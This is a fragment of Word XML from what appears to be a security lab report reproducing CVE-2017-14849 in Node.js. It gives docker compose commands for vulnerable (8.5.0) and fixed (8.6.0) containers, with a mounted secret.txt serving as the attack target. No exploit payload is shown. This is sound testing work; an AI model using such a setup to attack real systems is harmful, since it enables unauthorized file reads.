        <w:t>├── evidence/                 raw scan and exploit transcripts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>├── .github/workflows/security-ci.yml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>└── README.md</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>```</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Limitations of this run</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**Two reproduction paths are provided**, and both give the same result.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  The Docker path is the canonical one and matches the manual:</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xml:space="preserve">  ```bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  cd cve/CVE-2017-14849</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  docker compose up -d --build                       # node:8.5.0, vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  docker compose -f docker-compose.fixed.yml up -d --build   # node:8.6.0, fixed</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xml:space="preserve">  `verify-docker.ps1` runs both in sequence and writes `docker-evidence.txt`.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  The native path (official Node.js 8.5.0 binary, no container runtime) is kept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  because it needs nothing installed and was the first method used here.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**The attack target is mounted, not baked into the image.** `secret.txt` is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  bind-mounted at `/usr/src/secret.txt` in *both* compose files. If only the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  vulnerable image contained it, a 404 on the fixed image would prove nothing —</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  the file might simply be missing. Mounting it in both leaves the runtime</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  version as the only variable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>* **The repository history was created after the working tree was complete**,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  so the commits show the finished state rather than the development process.</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